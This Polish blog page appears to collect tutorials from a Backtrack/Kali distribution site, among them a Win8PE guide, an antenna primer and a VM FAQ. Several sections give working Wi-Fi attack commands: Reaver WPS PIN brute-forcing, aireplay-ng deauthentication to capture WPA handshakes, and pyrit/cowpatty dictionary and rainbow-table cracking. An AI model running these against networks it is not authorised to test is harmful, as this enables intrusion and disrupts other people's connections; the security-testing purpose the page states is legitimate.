Archiwa kategorii: Poradniki

Win8PE -Preinstallation Environment- Windows 8 na pendrive.

Zapewne wielu z nas używa naszej dystrybucji Kali lub dawniej Backtrack w wersji odpalanej z pendriva,ale pewnie  wielu  z nas używa jako głównego systemu którejś z edycji Windows.Niestety Windowsy są raczej podatne na wirusy i inne mniej lub bardziej poważne uszkodzenia systemu często trudne do naprawienia z poziomu działającego Windowsa.
Można by się zastanowić co zrobimy  jeśli po jednym z restartów  nasz Windows się nie podniesie …
W tym momencie mogę tylko sobie wyobrazić niebieski ekran odbijający się w waszych szerokootwartych oczach.Krótko mówiąc .. nie jest dobrze :/
I tu właśnie z pomocą może nam przyjść Windows 8 Preinstallation Environment odpalany bezpośrednio z pendriva.
Daje on nam  możliwość ewentualnej naprawy systemu,ręcznego usunięcia wirusów,przekopiowania danych i wiele innych ciekawych możliwości które sami odkryjecie.
Do dodatkowych zalet można doliczyć bardzo mały rozmiar na pendrive w wersji 64bitowej Enterprise zaledwie 422 MB,a w wersji 32bitowej Enterprise 300 MB 🙂 …Tak,dobrze czytacie trzysta lub czterysta megabajtów 🙂

Czego nie da nam nasz WIN8-PE-SE ?
Napewno nie może być stosowany  jako główny system ,a raczej jako narzędzie lub  coś w rodzaju koła ratunkowego.
Nie ma w nim ekranu Metro(pewnie wielu z tego się ucieszy) za to jest menu start.

Postaram się wam przybliżyć  kroki ,którymi wykonamy naszego WIN8-PE-SE  LiveUSB. Czytaj dalej

Kali Linux Premium PL Live-persiestence z zapisywaniem zmian.

Z uwagi na to ,że ostatnio poświęciłem dość sporo czasu  na  uruchomienie  trybu persistent na Kali Premium PL ,a w naszym pięknym języku  niewiele można znaleźć postanowiłem napisać poradnik dla potomnych 🙂 .

W edycjach Backtracka było to  łatwiejsze niż  w Kali ale i z tym  na pewno każdy  sobie poradzi.

Co nam będzie potrzebne ?

  1. pendrive (w moim przypadku 16gb ale chyba mniejsze  też dają radę)
  2. program  do partycjonowania np MiniTool Partition Wizard 7 (darmowy)
  3. obraz Iso  Kali  Linux Premium PL  (tylko  i wyłącznie  nasza dystrybucja 🙂 )
  4. System Kali linux , Backtrack lub inny  linux odpalony  na   komputerze.

A więc do dzieła 🙂

Czytaj dalej

Poradnik, recenzja, opinie na temat sposobów pozyskiwania pakietów protokołu EAPOL znanych jako „handshake” za pomocą różnych programów jak np. aireplay-ng, mdk3 (VIDEO)

Poradnik, recenzja, opinie na temat sposobów pozyskiwania pakietów protokołu EAPOL znanych jako „handshake” za pomocą różnych programów jak np. aireplay-ng, mdk3 oraz proces ich analizy mający na celu odzyskanie hasła WPA lub sprawdzenie poziomu zabezpieczeń punktów dostępowych.

Recenzja/poradnik może zawierać błędy, niektóre nazwy celowo lub przypadkiem zostały spolszczone.

Za dużo mocy, czyli jeszcze raz txpower i regulatory domain!

Nowa wersja Backtrack.pl PREMIUM Update1 faktycznie zawiera zmodyfikowaną wersję bazy stref regionalnych, która powoduje że każda podłączona karta, domyślnie pokazuje 30dBm lub 35dBm. Po raz kolejny zostałem zasypany lawiną pytań odnośnie tej modyfikacji… oczywiście wszystko poszło na mój PRYWATNY e-mail oraz Gadu a nie na FORUM!

Najczęściej zadawane pytania:

  • Czy moja karta XYZ spali się bo w danych pisze że ma 100mW a BT wyświetla 1W ?
    • Nie znam karty która by się spalił, na dodatek zmiana mocy za pomocą iwconfig wlan0 txpower na 90% kart NIE DZIAŁA WCALE!
  • Czemu nie dodaje narzędzi do podnoszenia mocy karty ALFA AWUS036H 1W które są dostępne w innych edycjach?
    • Ponieważ zmodyfikowana baza stref i tak wymusza max. 35dBm co i tak nie ma znaczenia dla AWUS036H ani czegokolwiek na RTL8187L ponieważ te układy nie obsługują regulacji mocy! Na dodatek producent robi wała z ludzi pisząc że zwiększa jej moc… wersja 1.0 miała 500mW przy antenie 3dBi, wersja 2.0 dostała 6dBi i ma 1W. Jednym słowem moc 1W karta osiąga (a raczej udaje) z anteną 6dBi.
  • Czy to prawda że im mniejsza moc nadawcza tym większa czułość? Czyli jak dam iwconfig wlan0 txpower 1 to będę miał większą czułość ?
    • Nie! Większość kart nie obsługuje tego parametru a te które obsługują nie ograniczają mocy do 1dBm tylko do takiej mocy jaką producent min. dla nich przewidział i nie ma to nic do czułości karty.
  • Jakie karty obsługują zmianę mocy?
    • Te na starych układach firmy Atheros z serii 4XXX 5XXX niektóre RaLink RT27XX RT28XX RT30XX , RaLink RT2571 (na sterowniku LEGACY),Prism54, Atmel (A32C), RTL8180 w wersji na PCI, wiele Broadcom-ów i praktycznie każdy Intel (ale do tego nie działa iwconfig)
  • Jak sprawdzić moc nadawczą karty w systemie Linux lub Windows?
    • Nie ma takiej możliwości.
  • Jak sprawdzić moc nadawczą karty ?
    • Specjalnym miernikiem lub AP który pokazuje moc ODBIERANEGO sygnału (np. dowolny sprzęt obsługujący DD-WRT) niestety pomiar jest ORIENTACYJNY.
  • Czy antena zwiększą moc karty ?
    • Nie, ale moc wypromieniowywana jest tylko w jednym kierunku.
  • Czemu dla mojej wbudowanej karty Atheros-a moc nadal jest 20dBm?
    • Niektóre karty na miniPCI oraz miniPCIe mają niepoprawianą strefę 0x60
  • Moja karta się spaliła po podniesieniu mocy!
    • Nie ma takiej możliwości, przyczyna była inna. Karta nie może wypromieniować z większą mocą niż sama posiada.
  • Czy programy dodawane do wielu edycji BT podnoszą faktycznie moc karty ?
    • Nie, karta na to nie reaguje. Trzeba pamiętać że układ RTL8187L to coś zupełnie osobnego od wzmacniacza który w przypadku ALFA AWUS036H jest RTL8225

Metasploit – Akcja TurboFTP

Poniższy tekst ma służyć wyłącznie celom edukacyjnym i jego autor nie odpowiada za ewentualnie niewłaściwe wykorzystanie zawartych w tym tekście informacji.

 

Niedawno, niedawno temu… 

Była mowa na różnych portalach o 0day Exploicie na TurboFTP Version 1.30.823 który też działa na TurboFTP Version 1.30.826. Czytaj dalej

Backtrack na maszynie wirtualnej, problemy- VMWare, VirutalBox, qemu, kvm

Pytania odnośnie maszyn wirtualnych zaczynają mnie lekko irytować, każdy by chciał aby chodziły tak jak komputer matka, a tu po prostu się nie da!

Zacznijmy jednak od początku. Co to jest maszyna wirtualna? To program który udaje przez programem, systemem gościa, że pracuje na prawdziwej maszynie i ma dostęp do jego zasobów. Sprzęt widoczny dla gościa to symulowana karta graficzna, dźwiękowa a nawet dysk czy pamięć. Idea maszyny jest taka, że nie powinna ona uniemożliwić systemowi gościa dostanie się do zasobów maszyny matki, chyba że administrator maszyny tak sobie rzeczy, wtedy możliwe jest eksportowanie niektórych sprzętów do gościa. Na chwilę obecną są to jednak, tylko sprzęty na USB i czasem dyski.

Jakie funkcje nie będą działać w Backtrack na maszynie wirtualnej?

  • Karty WiFi – wirtualny system nie zobaczy kart wifi, zintegrowanych, PCI, PCIe, miniPCI, miniPCIe, PCIMCA, ExpressCard – jest to spowodowane tym że programy do wizualizacji systemu, nie potrafią ich eksportować. (Mam na myśli WSZYSTKIE SPRZĘTY NA W/W ZŁĄCZA!) * z wyjątkiem vSphere
  • Karty WiFi na USB – niektóre karty da się wyeksportować inne nie. Dobrze eksportują się karty na układzie RTL8187L. Błędnie eksportują się karty na układzie AR9271. Nawet te które dobrze się eksportują mogą powodować masę problemów na maszynie wirtualnej których normalnie nie tworzą. Mogą nawet powodować totalne zawieszanie się systemu.
  • Karta graficzna (AMD Stream, CUDA) – nie ma możliwości eksportowania fizycznej karty graficznej do maszyny wirtualnej, ponieważ jest ona używana cały czas przez maszynę matkę. Dlatego pyrit na GPU nie będzie pracować.
  • Karta sieciowa kablowa – karta w maszynie wirtualnej zawsze jest wirtualna, dodatkowo, wirtualna sieć którą tworzy maszyna matka nie rzadko izoluje ją od gościa. Tak że podsłuchanie na gościu tego co robi matka staje się totalnie niemożliwe.
  • Dysk twardy – teoretycznie można eksportować dysk do maszyny gościa, niestety ja nie zalecam, ponieważ łatwo o pomyłkę. Taka pomyłka może nasz np. kosztować nadpisanie MBR na matce przez gościa przy eksportowaniu całego fizycznego dysku do gościa. Przy instalacji Fedory na dysku matki wewnątrz maszyny wirtualnej kończyło się uszkodzeniem systemu plików matki przy próbie re-partycjonowania
  • Procesor – zawsze jest wirtualne, możliwe jest nawet symulowanie procesora wielo rdzeniowego na maszynie która ma tylko jeden.
  • Pamięć – ilość pamięci maszyny wirtualnej w maszynie musi być zawsze mniejsza niż pamięć matki, tak aby mogła cały czas działać.

Jak użyć wszystkich możliwości Backtrack PREMIUM ?

Zainstalować go na prawdziwej maszynie, posiadającej:

  • przyzwoity procesor posiadający instrukcje SSE2 oraz przynajmniej dwa rdzenie
  • przynajmniej 1GB pamięci operacyjnej, mile widziane 2GB DDR2
  • dobra kartę, graficzną wspierającą AMD Stream lub CUDA, czyli np. AMD Radeon HD5670 lub GeForce GT260 i inne nowsze
  • dysk twardy na słowniki, tablice które potrafią zajmować miejsce

Co zrobić jeżeli cały dysk zajmuje Windows? – Istnieje wiele programów do modyfikacji partycji na żywym systemie, są też LiveCD które potrafią to robić nawet z partycją systemową Windows. Ja polecam jednak nie ruszać partycji systemowej a partycje dla Backtrack-a utworzyć na końcu dysku lekko zmniejszając partycje Windows-a/NTFS. Do tego celu polecam system LParted.

Jaką wersję BT pobrać jeżeli nie mam innej możliwości niż maszyna wirtualna ? – Każdą wersję poza wersjami dedykowanymi dla AMD lub nVidia, ponieważ zawierają one sterowniki dla prawdziwej karty graficznej a nie wirtualnej.

Kali Linux na maszynie wirtualnej? – Kali nie różni się w tej kwestii od Backtrack, tak samo powinien działać poprawie. Zalecam tylko używanie sterownika ekranu o nazwie „vmware” nawet dla qemu czy VirtualBox.

Jakie są znane problemy z maszynami wirutalnymi ? – Wiele kart wifi nie działa poprawnie, np. każda karta na układzie firmy Atheros/Qualcomm: AR9271, AR9170, AR9487WB+AR3XXX, AR9285WB+AR3XXX (WB = with bluetooth) RaLink RT3870, Realtek RTL8192. Istnieją też problemy z znacznym spadkiem wydajności CPU, nawet gdy posiadamy wsparcie dla zagnieżdżania stosu. Wydajność wirtualnego dysku także zmniejsza się w stosunku do fizycznego nośnika, wyjątkiem jest tylko qemu-kvm w trybie direct które udostępnia prawdziwy dysk.

Słyszałem że vSphere eksportuje wszystkie karty, czy to prawda? – Tak jest to możliwe, vSphere może nawet użyczać karty graficznej do użytku dla oclHashcat, jednak vSphere jest bardziej zaawansowane niż VMWare, VirutalBox i qemu razem wzięte. Więcej informacji o vSphere można odszukać tutaj. Jednak należy pamiętać że jest to oprogramowanie przeznaczone dla ekspertów a nie dla początkujących. Instalacja i konfiguracja jest znacznie trudniejsza niż innych maszyn wirtualnych. Jeżeli jesteś amatorem, łatwiej ci będzie zaprzyjaźnić się z innymi maszynami wirtualnymi oraz Kali Linux z LiveDVD niż vSphere.

Instrukcja obsługi programu REAVER.

 

Opis

Reaver jest programem wykorzystującym metode  brute force do łamania  WPS (Wifi Protected Setup) , w celu „wyjęcia” hasła z punktu dostępowego, zabezpieczającego   transmisje  danych na drodze AP-klient.  Średni czas złamania 8-cyfrowego kodu PIN, oraz uzyskania hasła zawiera się w granicach od 4 do 10 godzin. Do reaver-a dołaczony jest program o nazwie „wash”, dzieki któremu mamy możliwość  sprawdzenia, które AP są podatne na atak WPS.

Opcje programu „Wash v1.4” 

Wymagane argumenty:

-i, –interface=<iface> Interfejs odpowiedzialny za przechwytywanie danych

-f, –file [FILE1 FILE2 FILE3 …] Czytaj pakiety z plików

Opcjonalne argumenty:

-c, –channel=<num> Kanał nasłuchu [auto]

-o, –out-file=<file> Zapisz dane do pliku

-n, –probes=<num> Maksymalna liczba prób do wysłania do każdego AP w trybie skanowania [15]
-D, –daemonize Demonizuj wash

-C, –ignore-fcs Ignoruj błędy sumy kontrolnej ramek

-5, –5ghz Używaj kanałów częstotliwości 5GHz 802.11

-s, –scan Używaj trybu skan

-u, –survey Używaj trybu przeglądania  [domyślnie]

-h, –help Pokaz pomoc

Przykład zastosowania :

wash -i wlan18

Opcje programu „Reaver v1.4”

Wymagane argumenty:

-i, –interface=<wlan> Nazwa interfejsu w trybie nasłuchu

-b, –bssid=<mac> BSSID docelowego AP

Opcjonalne argumenty:

-m, –mac=<mac> MAC hosta

-e, –essid=<ssid> ESSID docelowego AP

-c, –channel=<channel> Ustaw 802.11 kanał dla interfejsu

-o, –out-file=<file> Wyślij log do pliku

-s, –session=<file> przywróć poprzednią sesje z pliku

-C, –exec=<command> Wykonaj podaną komendę z chwilą uzyskania PIN-u

-D, –daemonize „Demonizuj” reaver

-a, –auto Autodetekcja najlepszych opcji/ustawień dla docelowego AP

-f, –fixed Wyłącz „skakanie” po kanałach

-5, –5ghz Używaj kanałów częstotliwości 5GHz 802.11

-v, –verbose Wyświetlaj ostrzeżenia (-vv dla większej ilości)

-q, –quiet Tylko krytyczne wiadomości

-h, –help Pokaż pomoc

Opcje zaawansowane:

-p, –pin=<wps pin> Użyj 4 lub 8 liczbowego PIN-u WPS

-d, –delay=<seconds> Ustaw opóźnienie pomiędzy próbami

-l, –lock-delay=<seconds> Ustaw czas oczekiwania jeśli AP blokuje próby odgadnięcia PIN-u [60]

-g, –max-attempts=<num> Wyjdź po określonej ilości prób PIN

-x, –fail-wait=<seconds> Ustaw czas, po którym następuje  uśpienie, po 10 nieoczekiwanych niepowodzeniach

-r, –recurring-delay=<x:y> Spij przez y sekund każdej x próby PIN

-t, –timeout=<seconds> Ustaw czas do zakończenia

-T, –m57-timeout=<seconds> Ustaw czas zakończenia okresu M5/M7 [0.20]

-A, –no-associate Nie asocjuj z AP (asocjacja musi być wykonana przez inna aplikacje)

-N, –no-nacks Nie wysyłaj NACK jeżeli otrzymałeś pakiet „out-of-order” nie działa

-S, –dh-small Używaj małych kluczy DH w celu poprawy prędkości ataku

-L, –ignore-locks Ignoruj stan zablokowania zgłaszany przez docelowy AP

-E, –eap-terminate Zamykaj każdą sesję WPS po otrzymaniu nieprawidłowego pakietu EAP

-n, –nack Docelowy AP zawsze wysyła NACK [Auto]

-w, –win7 Mimic a Windows 7 registrar [False]

Przykład zastosowania:
reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -v

reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -vv -L -a

reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -p 82487317

reaver -i wlan18 -b 00:12:2A:6F:5D:D8 -c11 -p 82487317 -vv

Łamanie kodu PIN odbywa się dwuetapowo. W pierwszym etapie sprawdzane są wszystkie kombinacje pierwszych 4 cyfr. Po odgadnięciu pierwszej części  pinu sprawdzana jest jego druga część, lecz są to tylko numery pasujące do sumy kontrolnej. Czas odgadnięcia drugiej części PIN jest zazwyczaj znacznie krótszy niż pierwszej.

Kompatybilność sterowników/kart Wi-fi z programem „Reaver v1.4”

Poprawnie działające sterowniki.

Poniższe sterowniki zostały przetestowane, oraz zgłoszone jako poprawnie działające z programem reaver:

  • ath9k
  • rtl8187
  • carl19170
  • ipw2000
  • rt2800pci
  • rt73usb

Częściowo działające sterowniki.

Poniższe sterowniki mogą nie działać prawidłowo z programem reaver, w zależności od  zastosowanej karty wi-fi:

  • ath5k
  • iwlan
  • rtl2800usb
  • b43

Nie działające sterowniki.

Poniższe sterowniki/karty zostały przetestowane, oraz zgłoszone jako niepoprawnie działające z programem reaver:

  • iwl4965
  • RT3070L
  • Netgear WG111v3

Uwagi

  • Aby „reaver” działał poprawnie wymaga sygnału nie słabszego niż ok. -84 dbm.
  • Poprawna praca „reaver-a” wymaga ustawienia karty w trybie nasłuchu (monitor mode)
  •  W praktyce występują AP, z których po odgadnięciu kodu PIN nie ma możliwości „wyjęcia” poprawnego hasła dostępu do sieci. Wykorzystując ten sam PIN reaver „wyjmuje” różne hasła będące długimi ciągami alfanumerycznymi.
  • Należy zwrócić uwagę, że oprogramowanie niektórych AP posiada limit ilości prób możliwych do wykonania w określonym czasie. Po przekroczeniu danego limitu następuje blokada WPS uniemożliwiając nam dalszą kontynuacje ataku.

 

 

 

Teczowe testowanie hasła WPA2/AES – „Tęczowe Tablice” – cowpatty, pyrit, genpmk

Kilka osób prosiło mnie już o krótki opis użycia i generowania tęczowych tablic. Ponieważ dziś spędziłem nad nimi kilka h, krótko to opiszę.

Na początek wymagania dla osób które chcą używać tęczowych tablic:

  1. Dowolny słownik w postaci .txt lub .lst
  2. Backtrack 5

Wymagania dla osób które chcą generować tęczowe tablice:

  1. dowolny słownik
  2. Backtrack.pl 5 R3 PREMIUM (najlepiej AMD lub CUDA)
  3. Karta graficzna z CUDA lub AMD Stream (jeżeli mamy dużo cierpliwości to nie jest konieczne)

Co to są „Tęczowe Tablice” (ang. Rainbow Tables) – jest to baza, w tym wypadku hash-y, służąca do łamania hasła. Tablice pozwalają zaoszczędzić dużą ilość mocy obliczeniowej przy sprawdzaniu hand-shake-ów sieci o tych samych ESSID-ach. Przeciętny procesor powinien być w stanie sprawdzić około 100tyś. pmk/s dobre nowoczesne maszyny nawet do 1-2mln. pmk/s. trzeba jednak pamiętać że nie ma sensu tworzyć tablic dla bardzo unikalnych ESSID-ów które mogą się nigdy nie powtórzyć.

Zaczynamy od złapania 4-way hand shake:

airmon-ng start wlan0

airodump-ng -w linksys --bssid 00:21:91:2C:E4:FB -c 11 mon0

Oczywiście podany BSSID to nasz AP którego ESSID to linksys, mon0 to karta w trybie monitor mode. Odpali nam się airodump i zacznie nasłuchiwać, możemy to tak zostawić, poczekać aż jakiś klient się podłączy co w 90% daje nam pewny hs lub jeżeli są kliencie próbować go rozłączyć za pomocą komendy:

aireplay-ng -0 1 -c 00:22:43:07:6D:63 -a 00:21:91:2C:E4:FB mon0

Gdzie 00:22:43:07:6D:63 to nasz klient. Nie należy przesadzać z ilością deauth-ów ponieważ może to spowodować że system zaniecha próby ponownego łączenia np. po 3 nieudanych próbach. Dzieje się tak często gdy system klient-a to Windows XP/Vista/7. Efektem komendy powinien być mały komunikat u góry okna:

CH 11 ][ Elapsed: 56 s ][ 2012-09-26 18:14 ][ WPA handshake: 00:21:91:2C:E4:FB

Po wyjściu z airodump CTRL+C w katalogu stworzy się plik z nazwą linksys i końcówką .cap, w tym pliku jest zapisany hand-shake i musimy go zatrzymać do późniejszej analizy. Aby złapać hs, musimy być w zasięgu AP oraz KLIENTA tej sieci, musimy zablokować nasłuch na kanale AP. Nie można używać anten mocno kierunkowych, jak grid czy parabola. Najlepiej na niedużych odległościach sprawdzają się anteny panelowe o średnim zysku i szerokim kącie pół-mocy. Ewentualnie możemy zastosować anteny omni o dużym kącie pół-mocy, zazwyczaj są to anteny o zysku do 6dBi. Przeciętna antena 9dBi ma kont pół-mocy na poziomie 10 stopi co jest stanowczo za mało. Gdy testujemy poziom zabezpieczeń w budynkach z wieloma piętrami, powinno się używać anten omni o większym zysku, czyli np. 9dBi ale wymusza to na nas poruszanie się miedzy kondygnacjami.

Jeżeli nie chcemy tworzyć tęczowych tablic już w tym momencie możemy przystąpić do „zgadywania” hasła za pomocą aircrack, pyrit-a lub cowpatty.

pyrit -e linksys -i mega.txt -o - passthrough | cowpatty -d - -r linksys-01.cap -s linksys

sam pyrit:

pyrit -e linksys -i mega.txt -r linksys-01.cap attack_passthrough

samo cowpatty:

cowpatty -r  linksys-01.cap -f mega.txt -s linksys

lub

aircrack-ng -w mega.txt -e linksys linksys-01.cap

Najlepsze rozwiązanie to pyrit + cowpatty, ewentualnie sam pyrit, głównie ze względu na szybkość i użycie GPU.

Alternatywną metodą łamania powtarzających się ESSID-ów są tęczowe tablice, które jak wcześniej pisałem oszczędzają nam masę czasu i powalają NIE POSIADAĆ szybkiego GPU, ponieważ wilcza część pracy została już „odwalona” przy ich tworzeniu.

Tworzenie „Tęczowych tablic” – metod na ich tworzenie jest naprawdę masa, same tablice z hash-ami mogą występować w kilku różnych formatach np. format cowpatty lub airolib. Mogą też być magazynowane w bazie pyrit-a która znowu także może mieć format plikowy, baza w pliku sqlite lub mieścić się w prawdziwej bazie jak MySQL lub PostgeSQL. Na nasze potrzeby wystarczy baza plikowa w formacie pyrit-a, która na dodatek jest wybierana domyślnie i mieści się w katalogu .pyrit.

Metoda genpmk – metoda bardzo wolna, ponieważ nie używa wielu rdzeni ani GPU.

genpmk -f mega.txt -d linksys.cow -s linksys

mega.txt to słownik, jak wcześniej linksys.cow to tęczowa tablica, TYLKO i wyłącznie dla ESSID-a „linksys”

Metoda na pyrit-a – dużo szybsza używa tylko i wyłącznie bazy pyrit-a. Na początek importujemy słownik do bazy pyrit-a:

pyrit -i mega.txt import_passwords

Tworzymy SSID dla które ma zostać stworzona baza hash-ów:

pyrit -e linksys create_esssid

Generujemy hash-e dla wszystkich dodanych ESSID-ów:

pyrit batch

Od tego w bazie pyrit-a są gotowe hash-e dla ESSID-a linksys, których bez dodatkowych operacji możemy używać przez:

pyrit -e linksys -r linksys-01.cap attack_db

Jak widać nie musimy dopisywać -i mega.txt ponieważ słownik jest w bazie! Trzeba dodać że jest to jedna z najszybszych metod.

Metoda pyrit + cowpatty – metoda wymaga wykonania wszystkich poleceń jak przy metodzie pyrit-a z bazą danych, czyli:

pyrit -i mega.txt import_passwords

pyrit -e linksys create_esssid

pyrit batch

Następnie możemy przystąpić do generowanie tablic w formacie cowpatty, ale tym razem dużo szybciej niż za pomocą genpmk ponieważ pyrit używa GPU oraz każdego dostępnego rdzenia CPU.

pyrit -e linksys -o linksys.cow export_cowpatty

Tak jak poprzednio powstanie linksys.cow czyli Tęczowa tablica dla ESSID-a linksys. Możemy generować i podawać wiele ESSID-ów jednocześnie, dzięki temu będziemy mieli tablice dla każdego podanego ESSID-a.

Tak przygotowane tablice możemy bez problemy używać w cowpatty:

cowpatty -d linksys.cow -r linksys-01.cap -s linksys

tak samo w pyrit:

pyrit -i linksys.cow -e linksys -r linksys-01.cap attack_cowpatty

Trzeba też dodać że pyrit jest dużo bardziej rozbudowany i przyjmuje spakowane tablice za pomocą GunZip-a który znacznie redukuje ich rozmiar. Aby spakować tablice, należy wykonać:

gzip -9v linksys.cow

Powstanie nam plik linksys.cow.gz który bez problemu podamy zraz za -i . Cowpatty nie obsługuje kompresowanych tablice .gz.

Jeżeli mamy takie widzimisię możemy używać pyrit-a z cowpatty a wtedy już mamy absolutną dowolność formatów tablic, słowników, baz.

Najlepsze wyjście – mimo mnogości możliwości najlepsza metoda sprawdzania, powtarzających się ESSID-ów to moetoda z użyciem bazy danych pyrit-a, ewentualnie razem z cowpatty.

 

Pyrit – to bardzo dobry program, niestety jego wczesna faza rozwoju powoduje że lubi się wywalić, czasem dobra składnia raz powoduje poprawne działanie raz go wywraca, ja sprawdziłem to przynajmniej na kilku maszynach o różnych architekturach. Wersja PREMIUM zawiera możliwie najnowszą wersję pyrit-a pobraną z svn.

Tłumaczenie parametrów pyrit-a:

-b BSSID Access Point-a

-e ESSID Access Point-a czyli nazwa sieci np. linksys

-i plik wejścia, może to być np. słownik lub tęczowa tablica, obsługiwane są słowniki .gz (po kompresji GunZip-em)

-o plik wyjścia, np. do tworzenia tęczowych tablic, dodanie na końcu .gz powoduje że tablica zostanie skompresowana w locie.

-r plik .cap (pcap format) np. z airodump-a lub wireshark można też podać urządzenie jak wlan0

-u adres URL miejsca/sposobu przechowywania danych, może to być np. plik file:///baza, baza danych sqlite:///baza.db serwer tworzony przez pyrit-a relay http://192.168.1.12

–all-handshakes powoduje sprawdzanie handshaków w pliku .cap

Komendy:

  • analyze – analizuje plik .cap w poszukiwaniu hs

pyrit -r linksys.cap analyze

  • attack_batch – sprawdza wszystkie hs, zawarte w pliku .cap

pyrit -r test.pcap -e MojaSiec -b 00:de:ad:c0:de:00 -o HasloMojejSieci.txt attack_batch

  • attack_cowpatty – sprawdzanie hasła przy użyciu tablic cowpatty

pyrit -r mojasiec.cap -e MojaSiec -i rainbow.cow.gz -o - attack_cowpatty

  • attack_db – sprawdza hasła za pomocą tablic z bazy pyrit-a

pyrit -r mojasiec.cap -e mojasiec attack_db

  • attack_passthrough – sprawdza hasło przy pomocy słownika podanego za pomocą -i

pyrit -r mojasiec.cap -e mojasiec -i slownik.txt attack_passthrough

  • batch – generuje tzw. pay kluczy głównych na podstawie słownika wcześniej zaimportowanego i zapisuje jej z bazie pyrit-a

pyrit batch

pyrit -e mojasiec batch

  • benchmark – testuje wydajność pyrit-a
  • check_db – sprawdza poprawność bazy danych pyrit-a
  • create_essid – dodaje do bazy nowy ESSID który po użyciu komendy batch zostanie przetworzony, opcja przyjmuje wiele ESSID-ów na raz.
  • delete_essid – kasuje ESSID z bazy
  • pyrit -e mojasiec delete_essid
  • eval – pokazuje dodaje ESSID-y oraz ilość przygotowanych dla nich par kluczy gł.
  • export_passwords – eksportuje słownik dodany wcześniej do pliku, można podać .gz

pyrit -o slowni.txt export_passwords

  • export_cowpaty – eksportuje wszystkie pary kluczy gł. do pliku w formacie cowpatty

pyrit -e mojasiec -o mojasiec.cow export_cowpatty

  • export_hashdb – export do pliku/bazy w formacie airolib-ng

pyrit -o mojasiec.db -e mojasiec export_hashdb

  • import_passwords – importuje hasła z słownika do bazy pyrit-a

pyrit -i wordlist.txt import_passwords

  • import_unique_password – składnia sugeruje że hasła powinny być importowane bez dubli, ale według man, tak się nie dzieje. (nie polecam używać)
  • list_cores – pokazuje listę rdzeni procesora i sprzętowych przyspieszaczy jak np. GPU
  • list_essids – pokazuje listę ESSID-ów
  • passthrough – polecenie sprawdza hasła zawarte w słowniku, generuje pary kluczy gł. i wysyła je go -o , polecenie można połączyć z cowpatty przez stdio tak aby cowpatty analizowało generowane klucze w locie. Polecenie nie zapisuje kluczy w bazie pyrit-a.

pyrit -e linksys -i mega.txt -o - passthrough | cowpatty -d - -r linksys-01.cap -s linksys

  • relay – bardzo ciekawa komenda, pozwala przetwarzać hasła na klucze przez sieć, jest to bardzo przydatne gdy nie posiadamy w danej maszynie silnego GPU

Serwer, tam gdzie nie mamy silnego GPU:

pyrit -u sqlite:///root/baza.db relay

Klient, tu posiadamy silny GPU:

pyrit -u http://192.168.1.2:17934 batch

  •  selftest – sprawdza działanie mechanizmu przetwarzania pyrita
  • serve – kolejna, rewelacyjna opcja pyrita, serwer mocy obliczeniowej. Powoduje że na porcie 17934 otwiera się furtka do mocy obliczeniowej maszyny, tak że kliencie mogą się łączyć i przetwarzać za jej pomocą.

Serwer mus mieć wpis w .pyrit/config known_clients a następnie odpalone:

pyrit serve

Klient, musi mieć wpis w .pyrit/config rpc_server i odpalić lokalnie dowolną komendę:

pyrit -r mojasiec.cap.gz -e mojasiec -i slownik.txt attack_passthrouth

  • strip, stripLive – służą do wyjmowania z plików .cap samego handshake

pyrit -r "duzyplik.cap" -e MyNetwork -o tylko_hs_mojejsieci.cap.gz strip

  • verify – sprawdza 10% wygenerowanych wcześniej kluczy przez ich ponowne generowanie

Wydajność testowania hasła na tęczowych tablicach:

  • AMD Phenom II 4×3.6GHz (użyty 1 rdzeń) cowpatty ~280,000 pmk/s
  • AMD Phenom II 4×3.6GHz (użyte 4 rdzenie) pyrit ~1mln. pmk/s
  • AMD GPU 7870 GDDR5 pyrit ~5mln. pmk/s (wszystkie pliki na ramdisk-u)
  • Intel i3 2x2Ghz (użyty 1 rdzeń) cowpatty ~120,000 pmk/s
  • Intel i7 4×3.6GHz (cały czas w trybie turbo 3.8GHz, 1 rdzeń) cowpatty ~300,000pmk/s
  • Intel i7 4×3.6GHz (cały czas w trybie turbo 3.8GHz) pyrit ~1.1mln. pmk/s
  • Intel i5 + AMD GPU 5470M ~600,000 pmk/s
  • AMD A4 (2Ghz +5470M) + 7670M ~1.4mln. pmk/s
  • Intel CPU P4 Mobile cowpatty ~80,000 pmk/s

Materiały:
http://code.google.com/p/pyrit/w/list

http://wirelessdefence.org/Contents/coWPAttyMain.htm

Adnotacja: Wszystkie informacje mają służyć celą edukacyjnym oraz testowaniu bezpieczeństwa infrastruktury sieci firmowych. Nie namawiam do łamania prawa! Prawo łamią ludzie, nie programy.

Update: dla osób które nie posiadają szybkiego GPU lub nie mają cierpliwości czekać na ich generowanie postanowiłem wrzucić kilka gotowych tablic dla popularnych ESSID-ów. Wszystkie tęczowe tablice zrobione na bazie naszego polskiego słownika są dostępne tutaj.

Jaką antenę kupić i do czego, poradnik dla AMATORA. Omni, panel, sektor, grid a może parabolę?

Pod natłokiem, powtarzających się pytań na forum, postanowiłem stworzyć krótki poradnik na temat anten 2.4GHz dla amatorskich zastosowań, a także do wardrivingu.

Podstawy teoretyczne.

1. Moc – im większa moc nadajnika tym nasz sygnał będzie można odebrać z większej odległości, aby jednak komunikacja została nawiązana obie strony muszą nadawać z tą samą mocą.

AP „B” to baza, nadaje z mocą 500mW, klient „A” nadaje także z mocą 500mW, niestety klient „C” nadaje tylko z mocą 250mW. Mimo że „C” jest w zasięgu promieniowania „B” to „C” nie jest w stanie mu odpowiedzieć. Diagram zakłada że wszystkie sprzęty mają tą samą moc.

2. Strefa Fresnala – fala radiowa nie rozchodzi się po linii prostej tylko po elipsie.

Obiekty znajdujące się w niej powodują spadek siły sygnału, mimo że punkt docelowy jest widoczny. Promień strefy Fresnala zależy od częstotliwości oraz odległości między punktami.

3. Kąt promieniowania – jest to kąt rozpiętości wiązki wypromieniowanej. Zależy on głównie od typu anteny. Jest on istotny zarówno przy nadawaniu jak i przy odbiorze. Czasem jest on przedstawiany w postaci wykresu.

Na wykresie przedstawiono kąt promieniowania poziomego dla anteny panelowej o zysku 12dBi. Poprawnie opisana antena ma kąt promieniowania w pionie i poziomie.

Na diagramie stacja bazowa to „A”, stacja posiada kierunkową antenę o wąskim kącie. Klient „C” który znajduje się dalej niż „B” jest w stanie odebrać i wysłać z powrotem sygnał do „A”. Klient „B” nie odbiera sygnału z punktu „A” mimo że jest dużo bliżej niż „C”.

